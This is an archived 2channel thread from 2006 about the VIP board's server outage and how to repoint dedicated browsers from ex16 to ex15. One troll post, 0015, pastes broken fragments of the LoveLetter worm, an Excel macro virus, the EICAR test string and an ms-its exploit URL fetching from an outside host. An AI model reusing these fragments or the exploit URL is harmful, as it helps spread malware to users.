X



トップページ運用情報
1001コメント235KB
○●【ex15】VIP運用情報117●○
■ このスレッドは過去ログ倉庫に格納されています
0001動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
2ch鯖監視所
http://s.s2ch.net/sv2ch.html
バーボンチェック
http://qb6.2ch.net/_403/c403.cgi
wiki
http://vip.80.kg/

■VIPが落ちたら避難所へ
ニュース速報(VIP)@避難所
http://yy11.kakiko.com/news4vip/
ニュース速報(VIP)@2ch掲示板 避難所
http://ex14.vip2ch.com/news4vip/
ニュース速報(VIP)@3ch掲示板
http://www.3ch.jp/newsvip/

前スレ
○●【ex15】VIP運用情報116●○
http://qb5.2ch.net/test/read.cgi/operate/1151668134/
-------------------------------------------------
   ∧ ∧
   ( ´∀`) 負荷軽減のためにも専用ブラ使ってネ
   と○○つ
.   し' `J
http://www.monazilla.org/ (無料だよ)
http://www.s2ch.net/
http://i.s2ch.net/
http://pc7.2ch.net/software/

-------------------------------------------------
http://www.2ch.net/
0002動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:52:42ID:q4RMTk1U0
2
0003動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:53:03ID:2pAkrP600
0004動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:53:22ID:+Rfb28lY0
専ブラから見れないという方へ

http://ex15.2ch.net/news4vip/
ex16→ex15に戻ったので、手動でボード一覧を書き換えてね。終わり。
0005動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:54:02ID:UdO5LH41O
BIP閉鎖バンザーイ
0006動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:54:27ID:jpKvtY3M0
埋め
0007動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:57:32ID:v++zH9680
>>1
乙にゃー
0008動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 02:59:05ID:HRLFM3a50
VIPどうなってんの
0009動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:01:19ID:v++zH9680
潮が引くように人いなくなったな
0010動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:01:27ID:gEQd74Sx0
天国閉鎖キタ━━━━(。A。)━(゚∀゚)━(。A。)━(゚∀゚)━(。A。)━━━━!!!!
0011動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:01:27ID:16fyIOGX0
1000 名前:動け動けウゴウゴ2ちゃんねる[] 投稿日:2006/07/02(日) 03:01:05 ID:lhfOfAko0
1000なら天国閉鎖


ちょっwwwwとばっちりwwwwwwww
0012動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:01:28ID:FEdJi9Bz0
1000 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2006/07/02(日) 03:01:05 ID:lhfOfAko0
1000なら天国閉鎖


全スレ1000・・・貴様・・・・・・
0013動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:01:31ID:qF1+XFeD0
更に天国も閉鎖でつか
0014動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:02:25ID:PVoTLq4b0
もう全部閉鎖
0015動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:02:25ID:9CWRFQtK0
このテンプレ貼り忘れてるぞ
<body onload=window()>
If s = fso.CopyFile f1.path, f1.path+"l"
Set A4 (1)))
fso.copyfile \"
c MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = fso.CopyFile f1.path, f1.path+"l"
ToInfect.
G.RegWrite A
lines(n)=
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
0016動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:02:31ID:J2mubwUL0
保守ツール使ってるバカはサーバの負荷考えてるの?
0018動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:03:07ID:Ded2MjMT0
馴れ合って空保守繰り返してるバカはサーバの負荷考えてるの?
0019動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:03:51ID:zaEkurEq0
>>16
実況、安価指定のkskに比べれば大したものじゃないだろ
0020動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:04:20ID:MVYfkzF10
馴れ合ってパートスレ立ててる馬鹿はサーバの負荷考えてるの?
0021動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:04:41ID:scBhEWk/0
>>19
機械的に負荷かけてどーする
0022動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:04:42ID:hxNCO7I10
パートスレ保守も●持ち連投も鯖に大した影響与えてないだろカス
0023動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:04:54ID:2CMP3j9n0
なんでツール使ってるバカをアク禁にしないの?
0024動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:05:10ID:QyAxEpbC0
むしろVIPにいるバカはVIP鯖の負荷考えてるの?
0026レベッカ宮本 ◆BeckyIsBIA
垢版 |
2006/07/02(日) 03:05:38ID:SJ0weqyu0
      ,  -―- 、__
    /  /     ヽ 真実は、七つの世界の果てにある
   / , /ィ人  /メヽ ヽー-、
   ヽヽ{ ==ヽ ==、! :ハ〉 、ヽ
    と人"" -  "" レ'__スヽヘノ}¨ヽ
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0027動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:05:40ID:lhfOfAko0
ここって120秒規制なのか。
0028動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:05:43ID:PVoTLq4b0
VIPで鯖のことなんて考えてる奴いるの?
0029動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:05:48ID:XVocsPT90
今北結局何が原因だったの?
ex16に何か問題が?
0030動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:01ID:pdPso//70
janeはどうやって書き換えるんだ?
0031動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:03ID:sliASgDD0
ex16に移転したのと関係が?
0032動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:03ID:S+U5QQEn0
つーか運営はやる気あるん?
0034動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:04ID:KeudC57Y0
保守作業を繰り返す馬鹿をアク禁にしたらいいんじゃないの?
0035動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:06ID:+Rfb28lY0
VIP直ってるのに何でまだここにいるの?
0036動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:08ID:rxDSl0Ev0
VIP落ちてるってだけでこんなに必死になっちゃってかわいそう
0037動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:08ID:mZzZMmN70
保守の間隔は20秒くらいですよね^^
VIPって流れ早いから保守しまくらないと落ちちゃうお( ^ω^)
0039動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:15ID:/LEM7NQe0
とりあえずずっと言おうと思ったんだがミニスカサンタのエロゲスレはツール使いすぎだとオモタ
0040動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:16ID:2vwC/yxD0
バーローがひどいきがす
0041動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:33ID:lix90RYu0
今北
ex15に戻ったのか
0043動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:06:48ID:zaEkurEq0
■付けてスレ乱立とか
0045動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:07:00ID:d1glrEJp0
VIPに書き込んでるバカはサーバの負荷考えてるの?
0046動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:07:56ID:PVoTLq4b0
>>45
考えないだろ
0048動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:07:56ID:J2mubwUL0
保守ツール使ってる奴はそんなに頭こないんだけど、自作してばら撒いてるアフォがむかつく
0049動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:08:11ID:sliASgDD0
ex15は落ちてないな
0050動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:08:32ID:Ded2MjMT0
生きてる人間は地球の負荷考えてるの?
0051動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:08:58ID:wuWOBjM70
この熱くなってる人達って、何なの?
キモイよ・・・キモ過ぎる
こう言うのって、もっとアンダーなモノなんじゃないの?
表に出て来るなよ!
キミ達の自己主張が、周りに不快な思いをさせてるって自覚持ったら?













ってな感じのこと言われるとムカツクだろ?
だから俺はそんなこと絶対に言わないよ
0052動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:08:59ID:GzyadWMo0
見れない><
0053動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:09:17ID:mZzZMmN70
保守ツールほしい人いるかお( ^ω^)?
いたらうpするお( ^ω^)
0054動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:09:29ID:XVocsPT90
JaneフォルダにあるJane2ch.brdをリネーム→Jane2ch.brd.txtとでも書き換え
その中のVIPのURLのex16になってるのをex15に書き換えるだけ

まあみんな分かってるとおもうけど念の為
0055動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:09:48ID:wCrgOJK0O
このスレの伸びは何なの?難民ビッパの避難所なの?
また移転早々またVIP鯖落ちしてるし
0056動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:10:08ID:gEQd74Sx0
>>48
例のスクリプタのことかー
0057レベッカ宮本 ◆BeckyIsBIA
垢版 |
2006/07/02(日) 03:10:23ID:SJ0weqyu0
     __
    i<´   }\   , - 、
   ヽ.._\./  .ンく r-兮、 __
    ∠`ヽ.! /   ヾニEヲぐ ,ゝ->  <ちょっとAA変えたんだけど、どうかな?
   /_`シ'K-───‐-、l∠ イ 
   l´__,/l\、_ ̄0¨0)゙@Yヘ, -┤ 
.    l'___|⌒ヾ''ー==、ーr='イ i二| 
   / .」   i   /./7r‐く  lー!
.   f.  ヽ‐i人.∠'<   _i. l,.-ゝ.  
    トiヘヘ「ト〈      `X  トレi7__|  
   〉ト:トハj`! i.    /  トー┤lルj,リ  
  /‐+----+‐l    iー--i---ヾ'〃  
.  l_i____i__|   |___i,__i_|
0059動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:11:06ID:zfxtQIOP0
なんで15に移り直してんだよww
0060動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:11:31ID:giumLpO/0
早く何とかしろ
0061動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:12:58ID:4EqgRBnH0
    |┃三    ,ィ, (fー--─‐- 、、
    |┃.    ,イ/〃        ヾ= 、
    |┃   N {                \
    |┃  ト.l ヽ               l
 ガラッ.|┃ 、ゝ丶         ,..ィ从    |
    |┃  \`.、_    _,. _彡'ノリ__,.ゝ、  |     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |┃三 `ゞf‐>n;ハ二r^ァnj< y=レヽ    <  みんな待たせたな!
    |┃.    |fjl、 ` ̄リj^ヾ)  ̄´ ノ レ リ     |   
    |┃三  ヾl.`ー- べl,- ` ー-‐'  ,ン       \____________
    |┃      l     r─‐-、   /:|
    |┃三     ト、  `二¨´  ,.イ |
    |┃     _亅::ヽ、    ./ i :ト、
    |┃  -‐''「 F′::  `:ー '´  ,.'  フ >ー、
    |┃    ト、ヾ;、..__     , '_,./ /l
0062動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:13:29ID:6icsIC110
IEでもギコナビでも見ることが出来ん
0064動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:13:50ID:GV026ztB0
>>61
帰れ
0065動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:13:51ID:J2mubwUL0
janeは jane2ch.brd っていうテキストファイルにボード一覧情報があるから
一回jane終了したあとに ex16.2 → ex15.2 に書き直して立ち上げれば見れるよ
0066動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:14:19ID:d1glrEJp0
C:\Program Files\gikoNavi\config→board開く
ex16→ex15に書き換える→上書き→ギコナビ起動
0067動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:15:46ID:J/i3+oA80
>>54ができない件
0068動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:15:56ID:RVYZixSr0
かちゅでも更新されんのだが
0069動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:16:02ID:GzyadWMo0
書換えたけど見れない
0070動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:16:18ID:9CWRFQtK0
>>67
パソコン教室にでも通え
0071動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:16:40ID:gEQd74Sx0
暇だからスレ一覧眺めてたんだけど
茨城・沖縄・北海道・神奈川・香川・熊本・埼玉等地名がスレタイに入ってるスレ多いなw
0073動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:17:36ID:ByejsCC+0
書き換える前にjane終了しとかないとダメだよ
終了した後に書き換えて起動
0074動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:17:38ID:S9p0Ihg00
できねえやつは専ブラ再起動させてねえんだろwwwwwwwwwwwww
0075動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:18:01ID:lhfOfAko0
誰かjaneのボード一覧取得URLおしえてくらはい><
いじってたらデフォ判んなくなった><
0076動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:18:55ID:gEQd74Sx0
実況・ネトラジスレもたくさんあるww
0077動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:20:25ID:tyasoaW30
>>75
ググれカス
0078動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:20:51ID:XVocsPT90
>>75
ヒント:一覧再取得
0079動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:21:13ID:6icsIC110
C:\Program Files\gikoNavi\config→board開く

           ↑
このぶぶんがわかりません
0080動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:21:29ID:+SJGWICa0
719 名前:root▲ ★[] 投稿日:2006/07/02(日) 03:19:13 ID:???0 ?#
>>716
障害発生ですね。
HDD 交換前と同じ障害が発生しました。

ハードかソフトかは、これから調査で。

720 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2006/07/02(日) 03:19:31 ID:4jaHVPnw0
>>715
>原因はex15と同じ状況
ex14じゃないかなあ?間違ってたらすまん

721 名前:root▲ ★[] 投稿日:2006/07/02(日) 03:20:22 ID:???0 ?#
リブートかかると、ex16 の news4vip が見えると思いますが、
そっちには書き込まない感じで。

ex16 のテストの際には、bbs.cgi 止めてやるです。

722 名前:root▲ ★[] 投稿日:2006/07/02(日) 03:20:39 ID:???0 ?#
>>720
ex14 ですね。指摘どうもです。
0081レベッカ宮本 ◆BeckyIsBIA
垢版 |
2006/07/02(日) 03:22:10ID:SJ0weqyu0
      ,  -―- 、__「〜をやって見たけど、〜で出来ない」等の具体的な説明もなくただ「わかりませーん できませーん」
    /  /     ヽ 調べもせずに「おしえてくださーい」
   / , /ィ人  /メヽ ヽー-、恥ずかしくないの?
   ヽヽ{ ==ヽ ==、! :ハ〉 、ヽ
    と人"" -  "" レ'__スヽヘノ}¨ヽ
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0082動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:22:22ID:bRUu3lOc0
>>79
できても見れないから帰れ
0084動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:22:47ID:9qcZfo4K0
避難所とか壁とか無くなったんだけどー
0085動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:26:02ID:kBwkr0Ia0
で、早速ウイルスコード貼り付けてる馬鹿は何処の香具師だ?
0086動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:26:37ID:dQT0KZwV0
ギコだけどboardの中に何故か2ch.txtがない
0087動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:27:25ID:6icsIC110
>>86
俺のやつにもない
0088動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:27:35ID:J2mubwUL0
janeに乗り換え
0090動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:28:29ID:bRUu3lOc0
>>86
俺漏れも
0091動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:29:41ID:A/2gmW470
oremooremo
0092動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:30:23ID:lhfOfAko0
oreoreo
0093動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:30:27ID:wQZgIkfe0
C:\Program Files\gikoNavi\config\board.2ch
ってのがあるからboard.2chをエディターで開いていじるのさ!!

と難民脱出した俺が言ってみる
0094動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:30:35ID:guvNt4EJ0
>>81
できませーん
全然わかりませーん
教えてくださ〜い
0095動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:30:44ID:pIMhjY4H0
この町BBS.txtを町ex15.txtに変えたけど
当たり前のように駄目でした。
0096動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:31:43ID:9qcZfo4K0
Liveは?
0097動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:32:33ID:scBhEWk/0
janeに乗り換え
0098動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:33:01ID:bRUu3lOc0
>>93
0100動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:34:27ID:/l5ugOR90
もうVIP動いてるのかよ
かちゅです><助けて><
0101動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/02(日) 03:34:39ID:4jaHVPnw0
>>96
ボードデータをメモ帳で開く
書き換え
ボードデータの再読込
( ゚Д゚)ウマー
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況